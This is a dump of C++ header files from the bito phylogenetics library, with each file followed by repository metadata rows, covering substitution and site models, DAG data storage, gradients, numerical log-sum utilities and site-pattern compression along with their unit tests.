size_t> processor(executor_queue, work_queue, task); processor.Wait(); std::vector<float> correct_results({0, 1, 2, 3, 4, 5, 6, 7}); CHECK_EQ(results, correct_results); } #endif // DOCTEST_LIBRARY_INCLUDED
5,970
C++
.h
151
35.15894
97
0.676658
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,133
taxon_name_munging.hpp
phylovi_bito/src/taxon_name_munging.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include <functional> #include "sugar.hpp" namespace TaxonNameMunging { std::string QuoteString(const std::string &in_str); std::string DequoteString(const std::string &in_str); TagStringMap DequoteTagStringMap(const TagStringMap &tag_string_map); // Make each date in tag_date_map the given date minus the maximum date. void MakeDatesRelativeToMaximum(TagDoubleMap &tag_date_map); // Returns a map from each tag to zero. TagDoubleMap ConstantDatesForTagTaxonMap(TagStringMap tag_taxon_map); // Parses dates as numbers appearing after an underscore. Returns a map specifying the // height of each taxon compared to the maximum date. TagDoubleMap ParseDatesFromTagTaxonMap(TagStringMap tag_taxon_map); } // namespace TaxonNameMunging #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("TaxonNameMunging") { using namespace TaxonNameMunging; std::string unquoted_test(R"raw(hello 'there" friend)raw"); std::string double_quoted_test(R"raw("this is a \" test")raw"); std::string double_quoted_dequoted(R"raw(this is a " test)raw"); std::string single_quoted_test(R"raw('this is a \' test')raw"); std::string single_quoted_dequoted(R"raw(this is a ' test)raw"); CHECK_EQ(QuoteString(unquoted_test), R"raw("hello 'there\" friend")raw"); CHECK_EQ(DequoteString(double_quoted_test), double_quoted_dequoted); CHECK_EQ(DequoteString(single_quoted_test), single_quoted_dequoted); CHECK_EQ(DequoteString(QuoteString(unquoted_test)), unquoted_test); TagStringMap test_map( {{2, unquoted_test}, {3, double_quoted_test}, {5, single_quoted_test}}); TagStringMap expected_test_map( {{2, unquoted_test}, {3, double_quoted_dequoted}, {5, single_quoted_dequoted}}); CHECK_EQ(expected_test_map, DequoteTagStringMap(test_map)); // Test of TagDateMapOfTagTaxonMap appears in rooted_sbn_instance.hpp. } #endif // DOCTEST_LIBRARY_INCLUDED
1,995
C++
.h
37
51.513514
86
0.771326
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,134
substitution_model.hpp
phylovi_bito/src/substitution_model.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include <memory> #include <string> #include <vector> #include "block_model.hpp" #include "eigen_sugar.hpp" #include "sugar.hpp" class SubstitutionModel : public BlockModel { public: SubstitutionModel(const BlockSpecification::ParamCounts& param_counts) : BlockModel(param_counts) {} virtual ~SubstitutionModel() = default; size_t GetStateCount() const { return frequencies_.size(); } const EigenMatrixXd& GetQMatrix() const { return Q_; } const EigenVectorXd& GetFrequencies() const { return frequencies_; } const EigenVectorXd& GetRates() const { return rates_; } // We follow BEAGLE in terminology. "Inverse Eigenvectors" means the inverse // of the matrix containing the eigenvectors. const EigenMatrixXd& GetEigenvectors() const { return eigenvectors_; } const EigenMatrixXd& GetInverseEigenvectors() const { return inverse_eigenvectors_; } const EigenVectorXd& GetEigenvalues() const { return eigenvalues_; } virtual void SetParameters(const EigenVectorXdRef param_vector) = 0; // This is the factory method that will be the typical way of buiding // substitution models. static std::unique_ptr<SubstitutionModel> OfSpecification( const std::string& specification); inline const static std::string rates_key_ = "substitution_model_rates"; inline const static std::string frequencies_key_ = "substitution_model_frequencies"; protected: EigenVectorXd frequencies_; EigenVectorXd rates_; EigenMatrixXd eigenvectors_; EigenMatrixXd inverse_eigenvectors_; EigenVectorXd eigenvalues_; EigenMatrixXd Q_; }; class DNAModel : public SubstitutionModel { public: DNAModel(const BlockSpecification::ParamCounts& param_counts) : SubstitutionModel(param_counts) { frequencies_.resize(4); eigenvectors_.resize(4, 4); inverse_eigenvectors_.resize(4, 4); eigenvalues_.resize(4); Q_.resize(4, 4); } protected: virtual void UpdateEigendecomposition(); virtual void UpdateQMatrix() = 0; void Update(); }; class JC69Model : public DNAModel { public: JC69Model() : DNAModel({}) { frequencies_ << 0.25, 0.25, 0.25, 0.25; Update(); } // No parameters to set for JC! void SetParameters(const EigenVectorXdRef) override{}; // NOLINT virtual void UpdateEigendecomposition() override; void UpdateQMatrix() override; }; class GTRModel : public DNAModel { public: explicit GTRModel() : DNAModel({{rates_key_, 6}, {frequencies_key_, 4}}) { rates_.resize(6); rates_.setConstant(1.0 / 6.0); frequencies_ << 0.25, 0.25, 0.25, 0.25; Update(); } void SetParameters(const EigenVectorXdRef param_vector) override; protected: void UpdateQMatrix() override; }; // The Hasegawa, Kishino and Yano (HKY) susbtitution model. // // Reference: // Hasegawa, M., Kishino, H. and Yano, T.A., 1985. Dating of the human-ape splitting // by a molecular clock of mitochondrial DNA. Journal of molecular evolution, 22(2), // pp.160-174. class HKYModel : public DNAModel { public: explicit HKYModel() : DNAModel({{rates_key_, 1}, {frequencies_key_, 4}}) { rates_.resize(1); rates_.setConstant(1.0); frequencies_ << 0.25, 0.25, 0.25, 0.25; Update(); } void SetParameters(const EigenVectorXdRef param_vector) override; protected: virtual void UpdateEigendecomposition() override; void UpdateQMatrix() override; }; #ifdef DOCTEST_LIBRARY_INCLUDED #include <algorithm> TEST_CASE("SubstitutionModel") { auto CheckEigenvalueEquality = [](EigenVectorXd eval1, EigenVectorXd eval2) { std::sort(eval1.begin(), eval1.end()); std::sort(eval2.begin(), eval2.end()); CheckVectorXdEquality(eval1, eval2, 0.0001); }; auto gtr_model = std::make_unique<GTRModel>(); auto hky_model = std::make_unique<HKYModel>(); auto jc_model = std::make_unique<JC69Model>(); // Test 1: First we test using the "built in" default values. CheckEigenvalueEquality(jc_model->GetEigenvalues(), gtr_model->GetEigenvalues()); CheckEigenvalueEquality(jc_model->GetEigenvalues(), hky_model->GetEigenvalues()); EigenVectorXd param_vector(10); // Test 2: Now try out ParameterSegmentMapOf. gtr_model = std::make_unique<GTRModel>(); // First zero out our param_vector. param_vector.setZero(); // We can use ParameterSegmentMapOf to get two "views" into our parameter // vector. auto parameter_map = gtr_model->GetBlockSpecification().ParameterSegmentMapOf(param_vector); auto frequencies = parameter_map.at(SubstitutionModel::frequencies_key_); auto rates = parameter_map.at(SubstitutionModel::rates_key_); // When we modify the contents of these views, that changes param_vector. frequencies.setConstant(0.25); rates.setConstant(1.0 / 6.0); // We can then set param_vector and go forward as before. gtr_model->SetParameters(param_vector); CheckEigenvalueEquality(jc_model->GetEigenvalues(), gtr_model->GetEigenvalues()); // Test 3: Compare to eigenvalues from R. frequencies << 0.479367, 0.172572, 0.140933, 0.207128; rates << 0.060602, 0.402732, 0.028230, 0.047910, 0.407249, 0.053277; gtr_model->SetParameters(param_vector); EigenVectorXd eigen_values_r(4); eigen_values_r << -2.567992e+00, -1.760838e+00, -4.214918e-01, 1.665335e-16; CheckEigenvalueEquality(eigen_values_r, gtr_model->GetEigenvalues()); // Test HKY against GTR EigenVectorXd hky_param_vector(5); hky_param_vector.setZero(); auto hky_parameter_map = hky_model->GetBlockSpecification().ParameterSegmentMapOf(hky_param_vector); auto hky_frequencies = hky_parameter_map.at(SubstitutionModel::frequencies_key_); auto hky_kappa = hky_parameter_map.at(SubstitutionModel::rates_key_); hky_frequencies << 0.1, 0.2, 0.3, 0.4; hky_kappa.setConstant(3.0); hky_model->SetParameters(hky_param_vector); frequencies << 0.1, 0.2, 0.3, 0.4; rates << 0.1, 0.3, 0.1, 0.1, 0.3, 0.1; gtr_model->SetParameters(param_vector); CheckEigenvalueEquality(gtr_model->GetEigenvalues(), hky_model->GetEigenvalues()); CHECK(gtr_model->GetQMatrix().isApprox(hky_model->GetQMatrix())); } #endif // DOCTEST_LIBRARY_INCLUDED
6,209
C++
.h
150
38.353333
87
0.737914
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,135
site_model.hpp
phylovi_bito/src/site_model.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include <memory> #include <numeric> #include <string> #include <vector> #include "block_model.hpp" class SiteModel : public BlockModel { public: SiteModel(const BlockSpecification::ParamCounts& param_counts) : BlockModel(param_counts) {} virtual ~SiteModel() = default; virtual size_t GetCategoryCount() const = 0; virtual const EigenVectorXd& GetCategoryRates() const = 0; virtual const EigenVectorXd& GetCategoryProportions() const = 0; virtual const EigenVectorXd& GetRateGradient() const = 0; static std::unique_ptr<SiteModel> OfSpecification(const std::string& specification); }; class ConstantSiteModel : public SiteModel { public: ConstantSiteModel() : SiteModel({}), zero_(EigenVectorXd::Zero(1)), one_(EigenVectorXd::Ones(1)) {} size_t GetCategoryCount() const override { return 1; } const EigenVectorXd& GetCategoryRates() const override { return one_; } const EigenVectorXd& GetCategoryProportions() const override { return one_; } const EigenVectorXd& GetRateGradient() const override { return zero_; }; void SetParameters(const EigenVectorXdRef param_vector) override{}; private: EigenVectorXd zero_; EigenVectorXd one_; }; class WeibullSiteModel : public SiteModel { public: explicit WeibullSiteModel(size_t category_count, double shape) : SiteModel({{shape_key_, 1}}), category_count_(category_count), shape_(shape), rate_derivatives_(category_count) { category_rates_.resize(category_count); category_proportions_.resize(category_count); for (size_t i = 0; i < category_count; i++) { category_proportions_[i] = 1.0 / category_count; } UpdateRates(); } size_t GetCategoryCount() const override; const EigenVectorXd& GetCategoryRates() const override; const EigenVectorXd& GetCategoryProportions() const override; const EigenVectorXd& GetRateGradient() const override; void SetParameters(const EigenVectorXdRef param_vector) override; inline const static std::string shape_key_ = "Weibull_shape"; private: void UpdateRates(); size_t category_count_; double shape_; // shape of the Weibull distribution EigenVectorXd rate_derivatives_; EigenVectorXd category_rates_; EigenVectorXd category_proportions_; }; #ifdef DOCTEST_LIBRARY_INCLUDED #include <algorithm> TEST_CASE("SiteModel") { // Test 1: First we test using the "built in" default values. auto weibull_model = std::make_unique<WeibullSiteModel>(4, 1.0); const EigenVectorXd rates = weibull_model->GetCategoryRates(); EigenVectorXd rates_r(4); rates_r << 0.1457844, 0.5131316, 1.0708310, 2.2702530; CheckVectorXdEquality(rates, rates_r, 0.0001); // Test 2: Now set param_vector using SetParameters. weibull_model = std::make_unique<WeibullSiteModel>(4, 1.0); EigenVectorXd param_vector(1); param_vector << 0.1; weibull_model->SetParameters(param_vector); rates_r << 4.766392e-12, 1.391131e-06, 2.179165e-03, 3.997819e+00; const EigenVectorXd rates2 = weibull_model->GetCategoryRates(); CheckVectorXdEquality(rates2, rates_r, 0.0001); // Test 3: Check proportions. const EigenVectorXd proportions = weibull_model->GetCategoryProportions(); CheckVectorXdEquality(0.25, proportions, 0.0001); // Test 4: Check sum rates[i]*proportions[i]==1. CHECK_LT(fabs(rates.dot(proportions) - 1.), 0.0001); CHECK_LT(fabs(rates2.dot(proportions) - 1.), 0.0001); } #endif // DOCTEST_LIBRARY_INCLUDED
3,584
C++
.h
85
38.882353
86
0.747986
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,136
dag_data.hpp
phylovi_bito/src/dag_data.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // This class handles DAG General Data stored on nodes or edges. Handles storage and // resizing of data vectors. #pragma once #include "resizer.hpp" #include "reindexer.hpp" #include "gp_dag.hpp" #include "graft_dag.hpp" class GPDAG; class GraftDAG; template <class VectorType, class DataType, class DAGElementId, size_t DataPerElement = 1> class DAGData { public: explicit DAGData(const std::optional<const size_t> count = std::nullopt, std::optional<DataType> default_value = std::nullopt) : data_vec_() { size_t init_count = (count.has_value() ? count.value() : 0); size_t init_alloc = std::max(init_alloc_, (init_count + spare_count_) * 2); Resize(init_count, spare_count_, init_alloc); if (default_value.has_value()) { SetDefaultValue(default_value.value()); FillWithDefault(); } } // ** Counts // Set data size. void SetCount(const size_t count) { count_ = count; } void SetSpareCount(const size_t spare_count) { spare_count_ = spare_count; } void SetAllocCount(const size_t alloc_count) { alloc_count_ = alloc_count; } // Get data size. size_t size() const { return data_vec_.size(); } size_t GetCount() const { return count_; } size_t GetSpareCount() const { return spare_count_; } size_t GetPaddedCount() const { return count_ + spare_count_; } size_t GetAllocCount() const { return alloc_count_; } // ** Access // Access element in data. DataType &Get(const DAGElementId element_id) { Assert(element_id.value_ <= GetPaddedCount(), "Attempted to access element out of range."); return data_vec_[element_id.value_]; } const DataType &Get(const DAGElementId element_id) const { Assert(element_id.value_ <= GetPaddedCount(), "Attempted to access element out of range."); return data_vec_[element_id.value_]; } DataType &operator()(const DAGElementId element_id) { return Get(element_id); } const DataType &operator()(const DAGElementId element_id) const { return Get(element_id); } DataType &GetSpare(const DAGElementId element_id) { return Get(DAGElementId(element_id.value_ + GetCount())); } const DataType &GetSpare(const DAGElementId element_id) const { return Get(DAGElementId(element_id.value_ + GetCount())); } // Get full data vector. VectorType &GetData() { return data_vec_; } const VectorType &GetData() const { return data_vec_; } // Get data corresponding to the DAG elements. VectorType GetDAGData() const { return data_vec_.segment(0, GetCount()); } // Get data corresponding to the DAG elements, including spare elements. VectorType GetPaddedDAGData() const { return data_vec_.segment(0, GetPaddedCount()); } // Get data corresponding to the DAG elements. void SetDAGData(const VectorType &data_vec) { Assert(GetCount() == size_t(data_vec.size()), "Data Vector must be of equal size to current count."); for (size_t i = 0; i < GetCount(); i++) { data_vec_[i] = data_vec[i]; } } // Set data corresponding to the DAG elements, including spare elements. void SetPaddedDAGData(const VectorType &data_vec) { Assert(GetPaddedCount() == size_t(data_vec.size()), "Data Vector must be of equal size to current count."); for (size_t i = 0; i < GetCount(); i++) { data_vec_[i] = data_vec[i]; } } // Value to assign to newly added elements. std::optional<DataType> HasDefaultValue() const { return default_value_.has_value(); } DataType GetDefaultValue() const { Assert(default_value_.has_value(), "Cannot be called when DefaultValue not set."); return default_value_.value(); } void SetDefaultValue(const DataType default_value) { default_value_ = default_value; } // Fill all cells with given value. void Fill(const DataType fill_value) { for (size_t i = 0; i < GetPaddedCount(); i++) { data_vec_[i] = fill_value; } } void FillWithDefault() { Assert(default_value_.has_value(), "Cannot be called when DefaultValue not set."); Fill(default_value_.value()); } // ** Maintanence // Resizes data vector. void Resize(std::optional<const size_t> new_count = std::nullopt, std::optional<const size_t> new_spare = std::nullopt, std::optional<const size_t> explicit_alloc = std::nullopt, std::optional<const Reindexer> reindexer = std::nullopt) { const Resizer resizer(GetCount(), GetSpareCount(), GetAllocCount(), new_count, new_spare, explicit_alloc, resizing_factor_); Resize(resizer, reindexer); } // Resizes data vector. void Resize(const Resizer &resizer, std::optional<const Reindexer> reindexer = std::nullopt) { resizer.ApplyResizeToEigenVector<VectorType, DataType>(data_vec_, default_value_); SetCount(resizer.GetNewCount()); SetSpareCount(resizer.GetNewSpare()); SetAllocCount(resizer.GetNewAlloc()); if (reindexer.has_value()) { Reindex(reindexer.value(), resizer.GetNewCount()); } } // Reindex data vector. If reindexing during a resize, then length should be the old // count. void Reindex(const Reindexer &reindexer, const size_t length) { Reindexer::ReindexInPlace<VectorType, DataType>(data_vec_, reindexer, length); } auto begin() { return data_vec_.begin(); } auto end() { return data_vec_.end(); } protected: // Data vector VectorType data_vec_; size_t data_per_element_ = DataPerElement; // Value for determining growth rate of data vector. double resizing_factor_ = 2.0; // Value to set newly allocated data to. std::optional<DataType> default_value_ = std::nullopt; // Counts size_t count_ = 0; size_t spare_count_ = 10; size_t alloc_count_ = 0; // Unowned DAG reference. GPDAG *dag_ = nullptr; // Unowned GraftDAG reference. GraftDAG *graft_dag_ = nullptr; // Minimum default beginning allocated size of data vectors. static constexpr size_t init_alloc_ = 32; }; template <class VectorType, class DataType> class DAGNodeData : public DAGData<VectorType, DataType, NodeId> { public: explicit DAGNodeData<VectorType, DataType>( const std::optional<const size_t> count = std::nullopt, std::optional<DataType> default_value = std::nullopt) : DAGData<VectorType, DataType, NodeId>(count, default_value) {} explicit DAGNodeData<VectorType, DataType>( GPDAG &dag, std::optional<DataType> default_value = std::nullopt) : DAGData<VectorType, DataType, NodeId>(std::nullopt, default_value) { Resize(dag); } explicit DAGNodeData<VectorType, DataType>( GraftDAG &dag, std::optional<DataType> default_value = std::nullopt) : DAGData<VectorType, DataType, NodeId>(std::nullopt, default_value) { Resize(dag); } void Resize(const GPDAG &dag, std::optional<const size_t> explicit_alloc = std::nullopt, std::optional<const Reindexer> reindexer = std::nullopt) { Resize(dag.NodeCount(), std::nullopt, explicit_alloc, reindexer); } void Resize(const GraftDAG &dag, std::optional<const size_t> explicit_alloc = std::nullopt, std::optional<const Reindexer> reindexer = std::nullopt) { Resize(dag.HostNodeCount(), dag.GraftNodeCount(), explicit_alloc, reindexer); } void Resize(std::optional<const size_t> new_count = std::nullopt, std::optional<const size_t> new_spare = std::nullopt, std::optional<const size_t> explicit_alloc = std::nullopt, std::optional<const Reindexer> reindexer = std::nullopt) { DAGData<VectorType, DataType, NodeId>::Resize(new_count, new_spare, explicit_alloc, reindexer); } }; template <class VectorType, class DataType> class DAGEdgeData : public DAGData<VectorType, DataType, EdgeId> { public: explicit DAGEdgeData<VectorType, DataType>( const std::optional<const size_t> count = std::nullopt, std::optional<DataType> default_value = std::nullopt) : DAGData<VectorType, DataType, EdgeId>(count, default_value) {} explicit DAGEdgeData<VectorType, DataType>( GPDAG &dag, std::optional<DataType> default_value = std::nullopt) : DAGData<VectorType, DataType, EdgeId>(std::nullopt, default_value) { Resize(dag); } explicit DAGEdgeData<VectorType, DataType>( GraftDAG &dag, std::optional<DataType> default_value = std::nullopt) : DAGData<VectorType, DataType, EdgeId>(std::nullopt, default_value) { Resize(dag); } void Resize(const GPDAG &dag, std::optional<const size_t> explicit_alloc = std::nullopt, std::optional<const Reindexer> reindexer = std::nullopt) { Resize(dag.EdgeCountWithLeafSubsplits(), std::nullopt, explicit_alloc, reindexer); } void Resize(const GraftDAG &dag, std::optional<const size_t> explicit_alloc = std::nullopt, std::optional<const Reindexer> reindexer = std::nullopt) { Resize(dag.HostEdgeCount(), dag.GraftEdgeCount(), explicit_alloc, reindexer); } void Resize(std::optional<const size_t> new_count = std::nullopt, std::optional<const size_t> new_spare = std::nullopt, std::optional<const size_t> explicit_alloc = std::nullopt, std::optional<const Reindexer> reindexer = std::nullopt) { DAGData<VectorType, DataType, EdgeId>::Resize(new_count, new_spare, explicit_alloc, reindexer); } }; using DAGNodeDoubleData = DAGNodeData<EigenVectorXd, double>; using DAGEdgeDoubleData = DAGEdgeData<EigenVectorXd, double>; using DAGNodeIntData = DAGNodeData<EigenVectorXi, int>; using DAGEdgeIntData = DAGEdgeData<EigenVectorXi, int>;
9,892
C++
.h
221
39.307692
88
0.684194
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,137
phylo_gradient.hpp
phylovi_bito/src/phylo_gradient.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include <map> #include <vector> #include "phylo_flags.hpp" using GradientMap = std::map<std::string, std::vector<double>>; struct PhyloGradient { PhyloGradient() = default; PhyloGradient(double log_likelihood, GradientMap &gradient) : log_likelihood_(log_likelihood), gradient_(gradient){}; std::vector<double> &operator[](const PhyloMapkey &key) { return gradient_[key.GetKey()]; } double log_likelihood_; GradientMap gradient_; // Gradient mapkeys inline const static std::string site_model_key_ = "site_model"; inline const static std::string clock_model_key_ = "clock_model"; inline const static std::string substitution_model_key_ = "substitution_model"; inline const static std::string substitution_model_rates_key_ = SubstitutionModel::rates_key_; inline const static std::string substitution_model_frequencies_key_ = SubstitutionModel::frequencies_key_; inline const static std::string branch_lengths_key_ = "branch_lengths"; inline const static std::string ratios_root_height_key_ = "ratios_root_height"; }; // Mapkeys for GradientMap namespace PhyloGradientMapkeys { // Mapkeys inline static const auto site_model_ = PhyloMapkey("SITE_MODEL", PhyloGradient::site_model_key_); inline static const auto clock_model_ = PhyloMapkey("CLOCK_MODEL", PhyloGradient::clock_model_key_); inline static const auto substitution_model_ = PhyloMapkey("SUBSTITUTION_MODEL", PhyloGradient::substitution_model_key_); inline static const auto substitution_model_rates_ = PhyloMapkey( "SUBSTITUTION_MODEL_RATES", PhyloGradient::substitution_model_rates_key_); inline static const auto substitution_model_frequencies_ = PhyloMapkey("SUBSTITUTION_MODEL_FREQUENCIES", PhyloGradient::substitution_model_frequencies_key_); inline static const auto branch_lengths_ = PhyloMapkey("BRANCH_LENGTHS", PhyloGradient::branch_lengths_key_); inline static const auto ratios_root_height_ = PhyloMapkey("RATIOS_ROOT_HEIGHT", PhyloGradient::ratios_root_height_key_); inline static const auto set_ = PhyloMapkeySet( "PhyloModel", {site_model_, clock_model_, substitution_model_, substitution_model_rates_, substitution_model_frequencies_, branch_lengths_, ratios_root_height_}); }; // namespace PhyloGradientMapkeys
2,441
C++
.h
50
45.5
81
0.761125
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,138
numerical_utils.hpp
phylovi_bito/src/numerical_utils.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include <fenv.h> #include <limits> #include "eigen_sugar.hpp" #include "sugar.hpp" constexpr double DOUBLE_INF = std::numeric_limits<double>::infinity(); constexpr double DOUBLE_NEG_INF = -std::numeric_limits<double>::infinity(); constexpr double EPS = std::numeric_limits<double>::epsilon(); constexpr size_t OUT_OF_SAMPLE_IDX = std::numeric_limits<size_t>::max(); constexpr double DOUBLE_NAN = std::numeric_limits<double>::quiet_NaN(); // It turns out that log isn't constexpr for silly reasons, so we use inline instead. inline double LOG_EPS = log(EPS); constexpr double ERR_TOLERANCE = 1e-10; // DOUBLE_MINIMUM defines de facto minimum value for double to deal with // potential overflow resulting from summing of large number of log // probabilities. // Note: using std::numeric_limits<double>::lowest() may result in numerical // instability, especially if other operations are to be performed using it. // This is why we are using a value that is slightly larger to denote // the lowest double value that we will consider. inline double DOUBLE_MINIMUM = std::numeric_limits<double>::lowest() * ERR_TOLERANCE; constexpr auto FE_OVER_AND_UNDER_FLOW_EXCEPT = FE_OVERFLOW | FE_UNDERFLOW; namespace NumericalUtils { // Return log(exp(x) + exp(y)). inline double LogAdd(double x, double y) { // See: // https://github.com/alexandrebouchard/bayonet/blob/master/src/main/java/bayonet/math/NumericalUtils.java#L59 // Make x the max. if (y > x) { double temp = x; x = y; y = temp; } if (x == DOUBLE_NEG_INF) { return x; } double neg_diff = y - x; if (neg_diff < LOG_EPS) { return x; } return x + log(1.0 + exp(neg_diff)); } // Return log(sum_i exp(vec(i))). double LogSum(const EigenVectorXdRef vec); // Returns a vector with the i-th entry given by LogAdd(vec1(i), vec2(i)) EigenVectorXd LogAddVectors(const EigenVectorXdRef vec1, const EigenVectorXdRef vec2); // Normalize the entries of vec such that they become logs of probabilities: // vec(i) = vec(i) - LogSum(vec). void ProbabilityNormalizeInLog(EigenVectorXdRef vec); // Exponentiate vec in place: vec(i) = exp(vec(i)) void Exponentiate(EigenVectorXdRef vec); // This code concerns the floating-point environment (FE). // Note that a FE "exception" is not a C++ exception, it's just a signal that a // problem has happened. See // https://en.cppreference.com/w/c/numeric/fenv/FE_exceptions // If there is a worrying FE exception, get a string describing it. std::optional<std::string> DescribeFloatingPointEnvironmentExceptions(); // If there is a worrying FE exception, report it and clear the record of there being // any exception. void ReportFloatingPointEnvironmentExceptions(std::string context = ""); } // namespace NumericalUtils #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("NumericalUtils") { double log_x = log(2); double log_y = log(3); double log_sum = NumericalUtils::LogAdd(log_x, log_y); CHECK_LT(fabs(log_sum - 1.609438), 1e-5); EigenVectorXd log_vec(10); double log_sum2 = DOUBLE_NEG_INF; for (Eigen::Index i = 0; i < log_vec.size(); i++) { log_vec(i) = log(i + 1); log_sum2 = NumericalUtils::LogAdd(log_sum2, log_vec(i)); } log_sum = NumericalUtils::LogSum(log_vec); CHECK_LT(fabs(log_sum - 4.007333), 1e-5); CHECK_LT(fabs(log_sum2 - 4.007333), 1e-5); NumericalUtils::ProbabilityNormalizeInLog(log_vec); for (Eigen::Index i = 0; i < log_vec.size(); i++) { CHECK_LT(fabs(log_vec(i) - (log(i + 1) - log_sum)), 1e-5); } NumericalUtils::Exponentiate(log_vec); double sum = 0.0; for (Eigen::Index i = 0; i < log_vec.size(); i++) { sum += log_vec(i); } CHECK_LT(fabs(sum - 1), 1e-5); // Here we use volatile to avoid GCC optimizing away the variable. volatile double d = 4.; std::ignore = d; d /= 0.; auto fp_description = NumericalUtils::DescribeFloatingPointEnvironmentExceptions(); CHECK_EQ(*fp_description, "The following floating point problems have been encountered: FE_DIVBYZERO"); } #endif // DOCTEST_LIBRARY_INCLUDED
4,167
C++
.h
97
40.556701
112
0.722675
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,139
site_pattern.hpp
phylovi_bito/src/site_pattern.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // A class for an alignment that has been compressed into site patterns. #pragma once #include <string> #include <vector> #include "alignment.hpp" #include "sugar.hpp" class SitePattern { public: SitePattern() = default; SitePattern(const Alignment& alignment, TagStringMap tag_taxon_map) : alignment_(alignment), tag_taxon_map_(std::move(tag_taxon_map)) { patterns_.resize(alignment.SequenceCount()); Compress(); } static CharIntMap GetSymbolTable(); static SymbolVector SymbolVectorOf(const CharIntMap& symbol_table, const std::string& str); Alignment GetAlignment() const { return alignment_; } const std::vector<SymbolVector>& GetPatterns() const { return patterns_; } size_t PatternCount() const { return patterns_.at(0).size(); } size_t GetPatternSymbol(size_t sequence_idx, size_t pattern_idx) const { return patterns_[sequence_idx][pattern_idx]; }; size_t SequenceCount() const { return patterns_.size(); } size_t TaxonCount() const { return tag_taxon_map_.size(); } size_t SiteCount() const { return alignment_.Length(); } const std::vector<double>& GetWeights() const { return weights_; } // Make a flattened partial likelihood vector for a given sequence, where anything // above 4 is given a uniform distribution. const std::vector<double> GetPartials(size_t sequence_idx) const; static SitePattern HelloSitePattern() { return SitePattern(Alignment::HelloAlignment(), {{PackInts(0, 1), "mars"}, {PackInts(1, 1), "saturn"}, {PackInts(2, 1), "jupiter"}}); } private: // The multiple sequence alignments represented by the site pattern, as a collection // of taxon names and sequences. Alignment alignment_; // A map from a unique tag to the taxon name. TagStringMap tag_taxon_map_; // The first index of patterns_ is across sequences, and the second is across site // patterns. std::vector<SymbolVector> patterns_; // The number of times each site pattern was seen in the alignment. std::vector<double> weights_; void Compress(); static int SymbolTableAt(const CharIntMap& symbol_table, char c); }; #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("SitePattern") { CharIntMap symbol_table = SitePattern::GetSymbolTable(); SymbolVector symbol_vector = SitePattern::SymbolVectorOf(symbol_table, "-tgcaTGCA?"); SymbolVector correct_symbol_vector = {4, 3, 2, 1, 0, 3, 2, 1, 0, 4}; CHECK_EQ(symbol_vector, correct_symbol_vector); } #endif // DOCTEST_LIBRARY_INCLUDED
2,738
C++
.h
60
40.516667
87
0.70015
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,140
block_model.hpp
phylovi_bito/src/block_model.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // A BlockModel is an abstract class to enable us to have parameter vectors that // get subdivided and used. To understand the structure of BlockModels, read the // header docs for BlockSpecification first. Then have a look at the GTR model // in substitution_model.hpp and those unit tests. // // The methods provided just wrap methods in BlockSpecification, so see the // corresponding docs for a description of what they do. #pragma once #include "block_specification.hpp" class BlockModel { public: BlockModel(const BlockSpecification::ParamCounts& param_counts) : block_specification_(param_counts) {} BlockModel(const BlockModel&) = delete; BlockModel(BlockModel&&) = delete; BlockModel& operator=(const BlockModel&) = delete; BlockModel& operator=(BlockModel&&) = delete; virtual ~BlockModel() = default; const BlockSpecification& GetBlockSpecification() const; EigenVectorXdRef ExtractSegment(EigenVectorXdRef param_vector, std::string key) const; EigenMatrixXdRef ExtractBlock(EigenMatrixXdRef param_matrix, std::string key) const; void Append(const std::string& sub_entire_key, BlockSpecification other); virtual void SetParameters(const EigenVectorXdRef param_vector) = 0; private: BlockSpecification block_specification_; }; // This is a virtual class so there are no unit tests. See // substitution_model.hpp.
1,490
C++
.h
31
45.774194
88
0.787733
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,141
beagle_accessories.hpp
phylovi_bito/src/beagle_accessories.hpp
